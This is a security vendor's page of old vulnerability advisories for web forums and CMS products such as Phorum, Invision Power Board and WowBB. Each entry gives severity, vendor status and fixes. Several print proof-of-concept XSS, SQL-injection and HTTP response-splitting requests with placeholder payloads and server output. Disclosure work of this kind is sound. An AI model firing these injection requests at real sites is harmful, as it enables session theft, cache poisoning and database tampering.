Positive Technologies
  Home       Contacts       Russian
MaxPatrol
Services
Research
Downloads
Company
Research
Advisories
Whitepapers
SecurityLab
Advisory
All vulnerabilities published here were discovered automatically by Positive Technologies Research Team with help full-featured commercial version of MaxPatrol. Free Demo version available for download has limitations in detection of such vulnerabilities.
Full list of vulnerabilities discovered by Positive Technologies Research Team available here: http://en.securitylab.ru/lab/.
PT-2009-12: Cross-site scripting in UMI.CMS
Date: 04.03.09
Application: UMI.CMS version 2.x below 2.7.1 build 10856
Platform: MS Windows
Severity: Medium
Link: http://www.umi-cms.ru
Vendor status
Fixed
Details

Impact
Solution
 
DotNetNuke Cross Site Scripting Vulnerabilities
Date: 09.08.05
Application: DotNetNuke Forum
Platform: ASP.NET
Severity: Medium
Link:
Vendor status
Notified.
Details
Publishing delayed.
Impact
Execute arbitrary HTML and script code in a users browser session in context of a vulnerable site.
Solution
Not available currently.
 
Multiple Vulnerabilities in Id Board
Date: 27.07.05
Application: Id Board 1.x
Platform:
Severity: High
Link: http://www.id-team.com
Vendor status
Notified.
Details
Publication suspended.
Impact
1. A remote user may be able to execute arbitrary SQL commands on the underlying database. 2. Execute arbitrary HTML and script code in a users browser session in context of a vulnerable site.
Solution
Not available currently.
 
Phorum HTTP Response Splitting Vulnerability
Date: 27.07.05
Application: Phorum
Platform:
Severity: Medium
Link: http://www.phorum.org
Vendor status
Notified.
Details
Publication suspended.
Impact
Exploitation of this vulnerability allows remote attackers to mount various kinds of attacks. For example: Cross-Site Scripting XSS, Web Cache Poisoning deface, Browser cache poisoning, Hijacking pages with user-specific information and etc...
Solution
Not available currently.
 
Phorum " location " HTTP Response Splitting Vulnerability
Date: 22.03.05
Application: Phorum 5.0.14a
Platform: PHP
Severity: Medium
Link: http://www.phorum.org
Vendor status
Vulnerability is fixed.
Details
Input passed to the "Location" parameter is not properly sanitised. This can be exploited to inject malicious characters into HTTP headers and may allow execution of arbitrary HTML and script code in a user's browser session in context of an affected site.

Request:

http://[server]/phorum5/search.php?forum_id=0&search=1&body=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a<html>Scanned by PTsecurity</html>%0d%0a&author=1&subject=1&match_forum=ALL&match_type=ALL&match_dates=30
Result:

HTTP/1.1 302 Found
Date: Tue, 01 Mar 2005 12:33:53 GMT
Server: Apache/1.3.31 (Unix) PHP/4.3.10
X-Powered-By: PHP/4.3.10
Location: http://[server]/phorum5/search.php?0,search=1,page=1,match_type=ALL,match_dates=30,match_forum=ALL,body=
Content-Length: 0
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 34
<html>Scanned by PTsecurity</html>
,author=1,subject=1
Connection: close
Content-Type: text/html
<...>
The vulnerability has been reported in Phorum version 5.0.14.
Other versions may also be affected.

Impact
Exploitation of this vulnerability allows remote attackers to mount various kinds of attacks. For example: Cross-Site Scripting XSS, Web Cache Poisoning deface, Browser cache poisoning, Hijacking pages with user-specific information and etc...
Solution
Update to version 5.0.15a. http://phorum.org/story.php?48 http://phorum.org/downloads/phorum-5.0.15a.tar.gz
 
SQL-injection in Ikonboard 3.1.x
Date: 16.12.04
Application: Ikonboard 3.1.x 3.1.0, 3.1.1, 3.1.2 and 3.1.3.
Platform: Perl
Severity: High
Link: http://www.ikonboard.com
Vendor status
Notified.
Details
Publication suspended.
Impact
A remote user may be able to execute arbitrary SQL commands on the underlying database.
Solution
Not available currently.
 
SQL-injection in Invision Power Board 2.x
Date: 12.11.04
Application: IPB 2.0.0, IPB 2.0.1, IPB 2.0.2
Platform: PHP
Severity: High
Link: http://www.invisionboard.com/
Vendor status
Vulnerability is fixed.
Details
An input validation vulnerability has been discovered reported in Invision Power Board v2.x. A remote user can conduct SQL injection attack.
Example
http://site/forum/index.php?act=Post&CODE=02&f=2&t=1&qpid=1[sql_injection]
Result:
mySQL query error: select p.*,t.forum_id FROM ibf_posts p LEFT JOIN ibf_topics t ON (t.tid=p.topic_id) WHERE pid IN (1[sql_injection])
mySQL error: You have an error in your SQL syntax near '[sql_injection])' at line 2
mySQL error code:
Date: Friday 12th of November 2004 06:53:25 PM

Impact
A remote user may be able to execute arbitrary SQL commands on the underlying database.
Solution
Install security update: http://forums.invisionpower.com/index.php?showtopic154916, http://forums.invisionpower.com/index.php?actAttach&typepost&id4992.
 
Cross site Scripting and SQL injection in Infuseum ASP Message Board
Date: 09.11.04
Application: Infuseum ASP Message Board 2.2.1c
Platform: ASP
Severity: Medium
Link: http://www.infuseum.com/
Vendor status
Notified.
Details
Publication suspended.
Impact
A remote user can access the tarusers cookies including authentication cookies. A remote user can inject SQL commands.
Solution
Not available currently.
 
Cross site Scripting and SQL injection in Nucleus v3.1
Date: 09.11.04
Application: Nucleus v.3.1
Platform: PHP
Severity: Medium
Link: http://nucleuscms.org/index.php
Vendor status
Notified.
Details
Publication suspended.
Impact
A remote user can access the target users cookies including authentication cookies. A remote user can inject SQL commands.
Solution
Not available currently.
 
SQL injection in AntiBoard v.0.7.3
Date: 04.11.04
Application: AntiBoard v.0.7.3
Platform: PHP
Severity: Medium
Link: http://www.resynthesize.com/code/antiboard_info.php
Vendor status
Notified.
Details
Publication suspended.
Impact
A remote user can execute SQL commands on the underlying database.
Solution
Not available currently.
 
Multiple SQL-injections in Land Down Under v701
Date: 30.10.04
Application: Land Down Under v701
Platform: PHP
Severity: Medium
Link: http://www.neocrome.net
Vendor status
Vulnerabilities have been fixed.
Details
An input validation vulnerability was reported in Land Down Under v701. A remote user can conduct SQL injection attack.
1. SQL-injections in GET
/users.php?f=1&s=1'[sql code here]&w=asc&d=50
/users.php?f=1&s=name&w=1'[sql code here]&d=50
/users.php?f=1&s=name&w=asc&d=1'[sql code here]
/users.php?f=1&s=1'[sql code here]&w=asc
/users.php?f=1&s=name&w=1'[sql code here]
/comments.php?id=1"[sql code here]
2. SQL-injections in POST
POST /auth.php?m=register&a=add HTTP/1.1
Host: www.neocrome.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
rusername="[sql code here]&remail=scanner@ptsecurity.com&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&x=1&rcountry=1
POST /auth.php?m=register&a=add HTTP/1.1
Host: www.neocrome.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 102
rusername=1&remail="[sql code here]&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&x=1&rcountry=1
3. Path disclosures:
/plug.php?h=1'
Result:
<...>
<br />
<b>Warning</b>: fopen(system/help/1.txt): failed to open stream: No such file or directory in <b>/home/neocrome/public_html/system/core/plug.inc.php</b> on line <b>266</b><br/>
Couldn't find a file : system/help/1.txt
<...>

POST /auth.php?m=login&a=check HTTP/1.1
Host: www.neocrome.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
PHPSESSID="&rusername=1&rpassword=1&x=1&rcookiettl=1
Result:
<...>
ion_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in <b>/home/neocrome/public_html/system/common.php</b> on line <b>169</b><br />
<...>

Impact
A remote user can execute SQL commands on the underlying database.
Solution
Check for update: http://www.neocrome.net/index.php?msingle&id91.
 
SQL injection â Phorum
Date: 24.10.04
Application: Phorum 5.0.11
Platform: PHP
Severity: Medium
Link: http://phorum.org/
Vendor status
Vulnerability fixed in CVS.
Details
An input validation vulnerability was discovered in Phorum 5.0.11. A remote user can conduct SQL injection.
1. SQL injection example
/read.php?1,[SQL CODE HERE],newer

Impact
A remote user can access the target users cookies including authentication cookies. A remote user may be able to execute arbitrary SQL commands on the underlying database.
Solution
Check for new version or update.
 
Cross Site Scripting, SQL injection and HTTP Response Splitting in Ideal BB 0.1.5.3
Date: 11.10.04
Application: Ideal BB 0.1.5.3
Platform: ASP
Severity: High
Link: http://www.idealbb.com/idealbb/
Vendor status
Notified.
Details
Publication suspended.
Impact
A remote user can access the target users cookies including authentication cookies. A remote user may be able to poison any intermediate web caches with arbitrary content. A remote user can inject SQL commands.
Solution
Not available currently.
 
SQL injection in Natterchat
Date: 09.10.04
Application: Natterchat Version 1.12 Final
Platform: ASP
Severity: Low
Link: http://www.natterchat.co.uk
Vendor status
Notified.
Details
Publication suspended.
Impact
A remote user can inject SQL commands to be executed on the underlying database.
Solution
Not available currently.
 
Cross Site Scripting in Express-web Content Managment System
Date: 06.10.04
Application: Express-web Content Managment System
Platform: ASP
Severity: Low
Link: http://www.express-web.ru/
Vendor status
Vulnerability is fixed.
Details
An input validation vulnerability was reported in Express-web Content Managment System. A remote user can conduct Cross Site Scripting attacks.
1. XSS in get
/info/search/default.asp?search=1&n="><Script>alert()</script>&b=1&e=1&a=1&where=1&u=1
/info/search/default.asp?search=1&n=1&b="><Script>alert()</script>&e=1&a=1&where=1&u=1
/info/search/default.asp?search=1&n=1&b=1&e="><Script>alert()</script>&a=1&where=1&u=1
/info/search/default.asp?search=1&n=1&b=1&e=1&a="><Script>alert()</script>&where=1&u=1
2. XSS in referer
GET /login.asp HTTP/1.1
Referer: "'><script>XSS CODE HERE</script>
3. XSS in Post
POST /feedback/subscribe/default.asp HTTP/1.1
Host: express-web
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
action=1&email="><Script>alert()</script>

Impact
A remote user can access the target users cookies including authentication cookies.
Solution
Check for new version or update.
 
Cross Site Scripting and SQL injection in DevoyBB 1.0.0
Date: 06.10.04
Application: DevoyBB 1.0.0 Forum
Platform: PHP
Severity: Low
Link: http://www.xtreme-boards.com/
Vendor status
Notified.
Details
Publication suspended.
Impact
A remote user can access the tar users cookies including authentication cookies. A remote user can inject SQL commands to be executed on the underlying database.
Solution
Not available currently.
 
Cross Site Scripting and SQL injection in Dmxready Site Chassis Manager
Date: 03.10.04
Application: Dmxready Site Chassis Manager
Platform: ASP
Severity: Low
Link: http://www.dmxready.com
Vendor status
Notified.
Details
Publication suspended.
Impact
A remote user can access the target users cookies including authentication cookies. A remote user can inject SQL commands to be executed on the underlying database.
Solution
Not available currently.
 
Cross Site Scripting in CyberStrong eShop ASP Shopping Card v4.6
Date: 03.10.04
Application: CyberStrong eShop
Platform: ASP
Severity: Low
Link: http://www.cyberstrong.com/eshop/
Vendor status
Notified.
Details
Publication suspended.
Impact
A remote user can access the target users cookies including authentication cookies.
Solution
Not available currently.
 
Cross Site Scripting in Invision Power Board
Date: 01.10.04
Application: Invision Power Board v2.0.0
Platform: PHP
Severity: Medium
Link: http://www.invisionboard.com/
Vendor status
Notified.
Details
An input validation vulnerability was found in Invision Power Board. A remote user can conduct Cross Site Scripting attack.
Example.
GET /index.php?s=5875d919a790a7c429c955e4d65b5d54&act=Login&CODE=00 HTTP/1.0
Referer: "'/><script>alert()</script>
Result:
<...>
nvisionpower.com/index.php?s=7ff7c2ec2bc7f6e349b326dcee4cf41c&act=Login&CODE=01" method="post" name="LOGIN" onsubmit="return ValidateForm()">
<input type="hidden" name="referer" value="\"\'/><script>alert()</script>" />
<div class="borderwrap">
<div class="maintitle"><img src='style_images/1/nav_m.gif' border='0' alt='>' width='8' height='8' /> Log In</div>
<div class="formsubtitle">Please enter your details below to log in</div>
<div class="errorwrap">
<h4>Attention!
<...>

Impact
A remote user can access the target users cookies including authentication cookies.
Solution
Not available currently.
 
Multiple SQL-injection, Cross Site Scripting Vulnerabilities in WowBB Forum
Date: 01.10.04
Application: WowBB forum 1.61
Platform: PHP
Severity: Medium
Link: http://www.wowbb.com/
Vendor status
Notified.
Details
Multiple vulnerabilities were found in WowBB forum. A remote user can conduct SQL injection attack and Cross Site Scripting attack.
1. SQL injection in Get
view_user.php?list=1&letter=&sort_by=[SQL CODE HERE]
view_user.php?id=1&posts=1&nr=1391&page=[SQL CODE HERE]
attachment.php?id=[SQL CODE HERE]
2. SQL injection in Post
POST /forum/view_topic.php HTTP/1.1
Host: wowbb
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
topic_id=1&forum_id='&poll_id=1&poll_vote=1&options[]=1&options[]=1&options[]=1&options[]=1&options[]=1
3. XSS in Get
GET /forum/view_user.php?city=Birmingham&country=[XSS CODE HERE] HTTP/1.0
GET /forum/view_user.php?city=Columbus®ion=Ohio&country=[XSS CODE HERE] HTTP/1.0
GET /forum/view_forum.php?id=16&show=[XSS CODE HERE]&sort_by=name HTTP/1.0
GET /forum/view_user.php?list=1&letter=[XSS CODE HERE]&sort_by=name_desc HTTP/1.0
GET /forum/view_topic.php?id=1401&forum_id=1&highlight=[XSS CODE HERE] HTTP/1.0
GET /forum/view_user.php?region=Ohio&country=[XSS CODE HERE] HTTP/1.0
GET /forum/index.php?show=[XSS CODE HERE]&sort_by=name HTTP/1.0
GET /forum/search.php?s=1&q=[XSS CODE HERE]&by_username=1 HTTP/1.0
GET /forum/view_user.php?list=1&letter=[XSS CODE HERE] HTTP/1.0
GET /forum/view_user.php?country=[XSS CODE HERE]
4. XSS in refer
GET /admin/admin.php?forum_id=1&delete_forum=1 HTTP/1.0
Referer: "'[XSS CODE HERE]
GET /admin/admin.php?category_id=2&cr HTTP/1.0
Referer: "'[XSS CODE HERE]
GET /admin/admin.php?resend=1 HTTP/1.0
Referer: "'[XSS CODE HERE]
GET /admin/admin.php?create_user_group=1 HTTP/1.0
Referer: "'[XSS CODE HERE]
4. XSS in Post
POST /forum/login.php HTTP/1.1
Host: wowbb
Content-Type: application/x-www-form-urlencoded
Content-Length: 172
register_me=1&user_name=1&user_email=[XSS CODE HERE]&user_password=1&user_retype_password=1&user_homepage=1&user_icq=1&user_aim=1&user_ym=1&user_msnm=1

Impact
A remote user can access the target users cookies including authentication cookies. A remote user can cause SQL commands to be executed by the underlying database.
Solution
Not available currently.
 
SQL injection, HTTP Response Splitting, Cross Site Scripting Vulnerabilities in w-Agora Forum
Date: 29.09.04
Application: w-Agora forum
Platform: PHP
Severity: Medium
Link: http://www.w-agora.net
Vendor status
Vulnerabilities have been fixed.
Details
Multiple vulnerabilities were found in w-Agora forum. A remote user can conduct SQL injection attack, HTTP Response Splitting and Cross Site Scripting attack.
1. SQL injection
http://w-agora/current/redir_url.php?bn=demos_links&key=[SQL CODE HERE]
http://w-agora/current/list.php?bn=demos_links&s=&c=[SQL CODE HERE]
2. XSS in GET
GET /current/download_thread.php?site=support&bn=support_install&thread=[XSS CODE HERE]
GET /current/list.php?bn=support_install&last=19&expnd=[XSS CODE HERE]
GET /current/list.php?site=support&bn=support_install&expnd=[XSS CODE HERE]
GET /current/list.php?site=demos&bn=demos_links&s=[XSS CODE HERE]
GET /current/list.php?bn=demos_links&s=[XSS CODE HERE]&c=ro
3. XSS in POST
POST /current/login.php HTTP/1.1
Host: w-agora
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
loginform=1&redirect_url=1&loginuser=[XSS CODE HERE]&loginpassword=1
POST /current/forgot_password.php HTTP/1.1
Host: w-agora
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
go=1&userid=[XSS CODE HERE]
4. HTTP Response Splitting
http://w-agora/current/subscribe_thread.php?site=support&bn=support_install&
thread=%0d%0aContent-Length:%200%0d%0a%0d%0a%20200%20OK%0d%0aContent-Type:%2
0text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a%3chtml%3eScanned%20by%20PTs
ecurity%3c/html%3e%0d%0a
http://w-agora/en/support_forums.php?bn=%0d%0aContent-Length:%200%0d%0a%0d%0
a%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%
0d%0a%3chtml%3eScanned%20by%20PTsecurity%3c/html%3e%0d%0a
http://w-agora/fr/support_forums.php?bn=%0d%0aContent-Length:%200%0d%0a%0d%0
a%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%
0d%0a%3chtml%3eScanned%20by%20PTsecurity%3c/html%3e%0d%0a
http://w-agora/en/demos_forums.php?bn=%0d%0aContent-Length:%200%0d%0a%0d%0a%
20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d
%0a%3chtml%3eScanned%20by%20PTsecurity%3c/html%3e%0d%0a
http://w-agora/fr/demos_forums.php?bn=%0d%0aContent-Length:%200%0d%0a%0d%0a%
20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d
%0a%3chtml%3eScanned%20by%20PTsecurity%3c/html%3e%0d%0a
5. Path discourse
http://www.w-agora/current/list.php?bn=support_install&last=19&collapse=|id|

Impact
A remote user can access the target users cookies including authentication cookies. A remote user can cause SQL commands to be executed by the underlying database. A remote user may be able to poison any intermediate web caches with arbitrary content.
Solution
Check for new version or update on developers site.
 
Multiple SQL-Injection and Cross Site Scripting Vulnerabilities in AliveSites Forum 2.0
Date: 29.09.04
Application: AliveSites Forum 2.0
Platform: ASP
Severity: Low
Link: http://www.alivesites.com
Vendor status
Notified.
Details
Multiple vulnerabilities were found in AliveSites Forum. A remote user can conduct SQL injection attack and Cross Site Scripting attack.
1. SQL injection
forum.asp?forum_id=[SQL CODE HERE]&forum_title=test
2. XSS
post.asp?forum_id=">[XSS CODE HERE]&method=Topic&forum_title=test
post.asp?forum_id=33&method=">[XSS CODE HERE]&forum_title=test
post.asp?forum_id=33&method=Topic&forum_title=">[XSS CODE HERE]
forum.asp?forum_id=33&forum_title=">[XSS CODE HERE]
post.asp?id=">[XSS CODE HERE]

Impact
A remote user can access the target users cookies including authentication cookies. A remote user can cause SQL commands to be executed by the underlying database.
Solution
Not available currently.
 
Multiple SQL-Injection and Cross Site Scripting Vulnerabilities in Gosmart4u Message Board
Date: 29.09.04
Application: Gosmart4u Message Board
Platform: ASP
Severity: Low
Link: http://www.gosmart4u.com/forum.aspx
Vendor status
Notified.
Details
Multiple vulnerabilities were found in Gosmart4u message board. A remote user can conduct SQL injection attack and Cross site scripting attack.
1. SQL injection
http://gosmart4u/messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1&Category=1
http://gosmart4u/messageboard/Forum.asp?Username=&Category=[SQL CODE HERE]
http://gosmart4u/messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1
http://gosmart4u/messageboard/Forum.asp?Category=[SQL CODE HERE]
POST /messageboard/Login_Exec.asp HTTP/1.1
Host: host-name
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Username=[SQL CODE HERE]&Password=1&Login=1
POST /messageboard/Login_Exec.asp HTTP/1.1
Host: host-name
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Username=1&Password=[SQL CODE HERE]&Login=1
2. XSS
http://gosmart4u/messageboard/Forum.asp?QuestionNumber=1&Find=1&Category=[XSS CODE HERE]
http://gosmart4u/messageboard/ReplyToQuestion.asp?MainMessageID=[XSS CODE HERE]

Impact
A remote user can access the target users cookies including authentication cookies. A remote user can cause SQL commands to be executed by the underlying database.
Solution
Not available currently.
 
Multiple Cross Site Scripting and HTTP Response Splitting Vulnerabilities in DCP-Portal
Date: 28.08.04
Application: DCP-Portal
Platform: PHP
Severity: Low
Link: http://www.dcp-portal.org
Vendor status
Notified. No reponse yet.
Details
Multiple vulnerabilities was found in DCP-Portal. A remote user can conduct Cross Site Scripting attacks and HTTP Response Splitting attacks. The following scripts are vulnerable:
annoucement.php
calendar.php
contents.php
index.php
news.php
register.php
search.php
Examples.
1. XSS
/calendar.php?year=[XSS CODE HERE]&month=09&day=01
/calendar.php?year=2004&month=[XSS CODE HERE]&day=01
/calendar.php?year=2004&month=09&day=[XSS CODE HERE]
/index.php?page=annoucements&cid=[XSS CODE HERE]
/annoucement.php?aid=8&cid=[XSS CODE HERE]
/news.php?nid=34&cid=[XSS CODE HERE]
/contents.php?cid=[XSS CODE HERE]
/index.php?cid=[XSS CODE HERE]
2. XSS in post
POST /index.php?page=send_write HTTP/1.1
Host: www.dcp-portal.org
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
PHPSESSID=1&yname=1&yadd=1&fname=1&fadd=1&url=[XSS CODE HERE]
POST /search.php HTTP/1.1
Host: www.dcp-portal.org
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
PHPSESSID=1&q=[XSS CODE HERE]&fields=1
POST /register.php HTTP/1.1
Host: www.dcp-portal.org
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
PHPSESSID=1&sex=1&sex=1&name=1&surname=1&email=scanner@ptsecurity.com&addres
s=1&zip=1&city=1&country=[XSS CODE HERE]
3. HTTP Response Splitting
POST /calendar.php?show=full_month HTTP/1.1
Host: www.dcp-portal.org
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
PHPSESSID=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aCont
ent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a%3chtml%3eScanned
%20by%20PTsecurity%3c/html%3e%0d%0a&s=1&submit=1
Result
<...>
(Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4
PHP/4.3.8 FrontPage/5.0.2.2634a mod_ssl/2.8.19 OpenSSL/0.9.7a
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=
Content-Length: 0
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 34
<html>Scanned by PTsecurity</html>
; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Transfer-Encoding: chunked
Content-Type: text/html
<...>


Impact
A remote user can access the target users cookies including authentication cookies. A remote user may be able to poison any intermediate web caches with arbitrary content.
Solution
Not available currently.
     
 
 
Copyright © 2002-2010 Positive Technologies